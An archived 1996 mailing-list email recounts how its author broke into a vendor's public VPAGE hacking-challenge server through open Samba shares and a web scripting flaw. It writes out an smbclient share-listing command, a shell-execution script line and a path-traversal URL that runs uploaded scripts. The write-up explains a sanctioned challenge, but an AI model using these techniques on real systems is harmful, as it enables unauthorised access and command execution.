From proff Thu Jul 4 12:05:59 1996 Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id MAA14970 for best-of-security; Thu, 4 Jul 1996 12:05:59 +1000 Received: from applejack.CS.YALE.EDU (APPLEJACK.CS.YALE.EDU [128.36.0.131]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id LAA14416 for ; Thu, 4 Jul 1996 11:57:54 +1000 Received: from eli.CS.YALE.EDU by applejack.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id UAA11539; Wed, 3 Jul 1996 20:20:34 -0400 (EDT) sender Postmaster@CS.YALE.EDU for Received: by eli.CS.YALE.EDU id UAA17536; Wed, 3 Jul 1996 20:16:50 -0400 (EDT) sender owner-sneakers@CS.YALE.EDU for sneakers-outgoing Received: from bulldog.CS.YALE.EDU by eli.CS.YALE.EDU (8.7.1/res.host.bitnet.cf-4.1) with ESMTP id UAA17478; Wed, 3 Jul 1996 20:13:13 -0400 (EDT) sender owner-sneakers@CS.YALE.EDU for Received: from access.mbnet.mb.ca by bulldog.CS.YALE.EDU (8.7.1/res.host.uucp.cf-4.1) with SMTP id UAA12217; Wed, 3 Jul 1996 20:12:45 -0400 (EDT) sender iceman@access.mbnet.mb.ca for Received: by access.mbnet.mb.ca id AA04109 (5.67b/IDA-1.4.4 for sneakers@CS.YALE.EDU); Wed, 3 Jul 1996 19:12:38 -0500 Date: Wed, 3 Jul 1996 19:12:37 -0500 (CDT) From: Oliver Friedrichs To: sneakers@CS.YALE.EDU Subject: World Star Holdings Inc. challenge Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: proff Precedence: bulk VPAGE ~~~~~ The product which is being developed by World Star Holdings Inc. is known as VPAGE. VPAGE is essentially a package designed to allow dynamic creation of web pages when a user selects a link on their server. Before delivering the web page to the user, security checks are done to ensure that the user is an authorized user. To support this dynamic delivery of web pages, an interpretive language known as MAPOL was developed. For each page, instead of having regular html documents, there are scripts which generate the page, after performing security checks. These scripts have an .mpl extension. The breakin ~~~~~~~~~~~ The hostname of the challenge server (205.200.247.10) was obtained via snmp. The hostname obtained was ZEUS. Using samba, it was easy to obtain a listing of filesystems which were being exported (now that we knew the hostname). # ./smbclient -L ZEUS -I 205.200.247.10 Initially on June 13, the following directories were directly mountable on host 205.200.247.10. The complete contents of these directories were accessible and easily modified by any user on the internet. (Not actual samba output, rather a DIR command). DOORCO~1 06-11-96 3:56p^M HTML 06-13-96 4:04a^M INI 06-13-96 3:04p^M SCRIPTS 06-13-96 9:08a^M SECURE 06-13-96 3:05p^M These directories were accessible via the netbios service, which offered unrestricted, unpassworded access to the system directories. Somewhere during the day of June 13, access was lost to the scripts and ini directories, however it remained for the html directory which contained html pages offered by the server. Windows NT does not easily allow any interaction with the operating system without having the system operator install a daemon to support this interaction. The dynamic design of VPAGE and the MAPOL scripting language made is possible to execute any Windows NT shell command, and obtain the output. The MAPOL language has an option to execute a shell command with the following syntax: PRINT SHELL("COMMAND.COM /C DIR /S C:\") By simply placing a .mpl script onto the server, it was possible to cause VPAGE to execute this script. VPAGE only looks in the scripts directory, however it was easily possible to force VPAGE to execute our own script in any other directory via: http://205.200.247.10/vpage3.exe?..\html\script.mpl When originally entering the challenge site via the initial web page, one is presented with a locked bank vault which requires an "account number" to pass through. The 101 digit account number to pass through the bank vault door was obtained by replacing a script called 'verify.mpl' which was originally used to compare the code entered by the user, with the passcode on the server. The verify.mpl script was modified to print out the passcode, and to succeed even if it was incorrect. At the bank teller window, one was presented with the following text: 'You have 10(ten) tries to break into an account in a 24 hour period. You must then wait 24 hours before you are eligible to try again.' The code obtained was: dkl14234rf3ew344idfr3j23qrfwojowqjoijo3481379491281 klj318912jo3j981oij3198u3k9ualsdjlkj289u492yaright After entering the code correctly, one was presented with a web page with the following text: 'CONGRATULATIONS!!! Please present the following statement to Ameritel.... 342423421237678679didn'tthinkyouwouldmakeittohere' No list of product codes and prizes were easily availible - perhaps hidden on another server and not referenced by this server. Any information stored on and passed by this server can be compromised in this case, if stored in encrypted form, it would still have to be unencrypted at some point. Within a day of contacting World Star Holdings Inc. this page was changed, and then stated: 'CONGRATULATIONS!!! You've made it through the entrance door! This establishes that you've got what it takes to take the CyberTest'96 Challenge. Good Luck!' (Which it will still state now when the 101 digit code is entered) No, the VPAGE software itself was not breached (however we have analyzed the software, and have come up with possible entry points). The entry points were weaknesses in their system setup - ones which anyone could have exploited with minimal knowledge of networking. I hereby certify that the above description is true, and that there are many reliable witnesses which can account for these events. A complete directory tree is availible which contains a listing of all files (including operating system) which were present on the system at the time of the breach. The actually breach occured from 00:01 A.M. June 14 until 5:00 A.M. June 14. Following is a listing of the root C:\ directory on the challenge server: Volume in drive C has no label Volume Serial Number is 9C3B-5A58 Directory of C:\ AMERITEL 06-14-96 4:01a ARJ EXE 104614 01-19-92 11:51p AUTOEXEC BAT 42 06-11-96 9:17a COMMAND COM 92870 07-11-95 9:50a CONFIG SYS 19 06-11-96 9:16a EMM386 EXE 125495 07-11-95 9:50a FTP 06-11-96 3:03p FTP_LOG 06-11-96 3:03p HAL DLL 48416 05-26-95 4:57a HIMEM SYS 32935 07-11-95 9:50a HTTP_LOG 06-12-96 12:15a I386 06-11-96 9:24a INI_FI~1 06-11-96 4:58p MOUSE COM 56408 03-10-93 6:00a MOUSE INI 53 12-21-94 12:06a PAGEFILE SYS 45088768 06-12-96 1:50p SMARTDRV EXE 45145 08-22-95 9:39a TEMP 06-13-96 1:36p USERS 06-11-96 1:20p WIN32APP 06-11-96 1:20p WINNT35 06-12-96 1:50p 21 file(s) 45594765 bytes 10-15 people were present when the correct account number was entered and the congratulations page was displayed. All web pages were printed out at the time they were displayed. I have been told that this completes 1/5th of the challange. I have been offered $500 by World Star Holdings Inc. however have not as of yet received payment. Oliver Friedrichs - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Oliver Friedrichs MBnet System Administrator "UNIX doesn't have bugs, it just develops random features"